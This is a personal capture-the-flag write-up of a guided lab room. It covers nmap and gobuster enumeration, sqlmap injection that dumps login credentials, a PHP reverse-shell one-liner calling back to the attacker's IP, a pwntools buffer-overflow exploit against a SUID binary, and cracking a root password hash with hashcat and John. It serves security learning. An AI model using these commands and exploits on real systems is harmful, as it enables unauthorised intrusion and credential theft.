The Cod Caper Writeup
This is a guided room that takes us through infiltrating and exploiting a linux system. It was an educative room for me since it's the first time I have encountered a buffer overflow attack, and had to use sqlmap. This expanded my knowledge on types of sql injection attacks. I also got a lot out of it as evidenced by the random questions I typed below which will push me to research further and understand more as opposed to just being a script kiddie. That being said, let's get started.
I performed an nmap scan with: $ nmap -T4 -p- 10.10.8.151 to find open ports. The only open ports were port 22 and port 80. I then ran the command below to further enumerate what services were running on the open ports.
$ nmap -A -T4 -p22,80 10.10.8.151This is what the nmap flags stand for:
-A All i.e. Enable OS detection, version detection, script scanning, and traceroute
-T4 the speed template, these templates are what tells nmap how quickly to perform the scan. The speed template ranges from 0 for slow and stealthy to 5 for fast and obvious.
-p specifes ports; in our case port 22 and port 80.
-p- All Transmission Control Protocol (TCP) ports: 1-65535
The image below shows the results of my scan.
Since the only services sunning are SSH and a web server, I decide to check out the web server first to see if I can find any possible vulnerabilities. I will use gobuster and the big.txt wordlist https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/big.txt to find any hidden files or directories
$ gobuster dir -u 10.10.8.151 -w /usr/share/wordlists/big.txt -x php,txt,htmlThis is what the gobuster flags stand for:
dir uses directory/file bruteforcing mode.
-u the target url
-w path to the wordlist
-x file extensions to search for
The image below shows my gobuster results:
We find a /administrator.php web page. When we navigate to it, we see a login form.
I decide to view the page source to see if there any hints or clues left behind. Maybe in the form of comments.
But I get nothing.
So we have a few options here: we can either try a brute-force attack, or find if the login form is vulnerable to sql injection.
Using the username admin and password 123456, I intercept the request using Burp Suite.
When I forward it to Repeater and press send, I get a “try Again” error message.
I try fuzzing the input to see if I can attempt a successful sql injection but it seems as if there is input validation.
I decide to use sqlmap to leak out the databases.
$ sqlmap -u 10.10.175.57/administrator.php --data 'username=&password=' -dbs
We have a database named ‘users’. Now let's dump out which tables belong to that database.
$ sqlmap -u 10.10.175.57/administrator.php --data 'username=&password=' -D users --tables
We also find a table by the name users. Now let's dump out the contents of that table.
$ sqlmap -u 10.10.175.57/administrator.php --data 'username=&password=' -D users -T users --dumpUseful sqlmap flags:
-u specifies which url to attack
-D DBMS database to enumerate
-T DBMS database table(s) to enumerate
--dump Used to retrieve data from the db once SQLI is found
--forms Automatically selects parameters from elements on the page
I discover the form is vulnerable to 3 types of sqli
And I also retrieve some promising information.
The username is pingudad and the password is secretpass. I go back to the login page and try out those credentials.
Once logged in, I discover a dialog box which I can use to run commands on the server.
I am going to try and get a php reverse shell. I will set up a listener on my attack machine using netcat first.
$nc -nvlp 1234
I get a php reverse shell code on the PentestMonkey website and make sure to replace the ip address with the one I have from THM.
$ php -r '$sock=fsockopen("10.9.17.44",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
And... boom!!!
Navigating to home, I find 2 user accounts: papa and pingu.
I need to find pingu's hidden password or ssh key. When I run ls -la in pingu's account, I get the following below:
Q. What is /etc/passwd used for in linux?
After peeking at a walkthrough I find that the hidden password is located at /var/hidden
Now I need to get privilege escalation.My go to tool of choice is LInPEASS. Since I have ssh access on the machine, I can use SCP (secure copy) to copy files over.
$ scp /opt/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh pingu@10.10.175.57:/tmp
When asked for the password, I input pinguapingu
Alternatively, I could have used SimpleHTTPServer which is a module that can host a basic webserver on my host/attacking machine. This would have enabled me to host LinPEASS. Assuming the victim machine has a way of remotely downloading files, I could have downloaded it from my host machine to the server.
I navigate to /tmp on the victim machine and run linpeass with the command: ./linpeas.sh
I see this interesting SUID file:
Pingu says he was able to snag a copy of the source code from his dad's flash drive.
The SUID file seems to expect 32 characters of input, and then immediately exits. This seems to warrant further investigation. We will have to do binary exploitation using pwndbg - a plugin for GDB which allows us to better examine binary files.
We will first run the following command:
$ gdb /opt/secret/root
Disclaimer: I had issues carrying out the buffer overflow attack. The below segment is a copy+paste of the guided instructions of the room. Once I get more experience, I aim to come back to this room and try again.
This lets us know that pwndbg has successfully initialized. We will now test what happens if we send more than 32 characters. To do this type r < <(cyclic 50), that command runs the program and provides 50 characters worth of "cyclic" input. Cyclic input goes like this: "aaaaaaaabaaacaaadaaaeaaaf" etc. Because it's in this "cyclic" format, it allows us to better understand the control we have over certain registers, for reasons you are about to see.
Once you run that command you should see something similar to this screen below:
Now this is where some knowledge of assembly helps. It seems that in this case we're able to overwrite EIP, which is known as the instruction pointer. The instruction pointer tells the program which bit of memory to execute next, which in an ideal case would have the program run normally. However, since we're able to overwrite it, we can theoretically execute any part of the program at any time.
Recall the shell function from the source code, if we can overwrite EIP to point to the shell function, we can cause it to execute. This is also where the benefits of cyclic input show themselves. Recall that cyclic input goes in 4 character/byte sequences, meaning we're able to calculate exactly how many characters we need to provide before we can overwrite EIP.
Luckily cyclic provides this functionality with the -l flag, running cyclic -l {fault address} will tell us exactly how many characters we need to provide we can overwrite EIP.
Running cyclic -l 0x6161616c outputs 44, meaning we can overwrite EIP once we provide 44 characters of input.
That's all we needed for pre-explotation!
Binary Exploitation: The pwntools Way
Pwntools is a python library and since it is a library, it requires python knowledge to use to it's full potential, and as such everything in this task will be done using a python script.
We start off the script with:
from pwn import *
proc = process('/opt/secret/root')
This imports all the utilities from the pwntools library so we can use them in our script, and then creates a process that we can interact with using pwntools functions.
We know that we need the memory address of the shell function, and pwntools provides a way to obtain that with ELF().
ELF allows us to get various memory addresses of important points in our binary, including the memory address of the shell function.
With the ELF addition our script becomes
from pwn import *
proc = process('/opt/secret/root')
elf = ELF('/opt/secret/root')
shell_func = elf.symbols.shell
shell_func holds the memory address of our shell function. Now we need a way to form the payload, luckily pwntools has that to with fit().
fit allows us to form a payload by combining characters and our memory address. To send the payload we can use a method in our proc variable, proc.sendline(), which just sends whatever data we want to the binary. Finally we can use proc.interactive(), to view the full output of the process.
With all that our final exploit script becomes
from pwn import *
proc = process('/opt/secret/root')
elf = ELF('/opt/secret/root')
shell_func = elf.symbols.shell
payload = fit({
44: shell_func # this adds the value of shell_func after 44 characters
})
proc.sendline(payload)
proc.interactive()
Disclaimer ends here above
I saved this script to a file named pwncode.py and then scp it to the server in the /tmp directory
$ sudo scp /home/pirate/Desktop/pwncode.py pingu@10.10.139.123:/tmpOnce done, I ran it.
pingu@ubuntu:/tmp$ python pwncode.py
We have the password hashes. We can crack them and get the root password.
Our root password hash is:
root:$6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck.:18277:0:99999:7:::
Q. How are passwords stored in linux?
I save the hash in a txt file on my Desktop as hash.txt
Luckily hashcat supports cracking linux password hashes. The hash begins with $6 which is for SHA-512 Algorithm.
Other hashing algorithms:
$1 = MD5 hashing algorithm.
$2 =Blowfish Algorithm is in use.
$2a=eksblowfish Algorithm
$5 =SHA-256 Algorithm
$6 =SHA-512 Algorithm
I run hashcat using the following command:
$ hashcat -m 1800 hash.txt /usr/share/wordlists/rockyou.txt --force
The -m flag specifies the hash-type, which in this case is SHA-512 Algorithm which is identified by 1800. And I use the rockyou.txt wordlist.
We get the results below:
The root password is therefore: love2fish
We can also use JohnTheRipper to crack the hash. I noticed it was able to automatically detect the algorithm used in the hash.
$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt /home/pirate/Desktop/hash.txt
Further Reading on pwntools and pwndbg: http://docs.pwntools.com/en/stable/ https://browserpwndbg.readthedocs.io/en/docs/
Last updated
Was this helpful?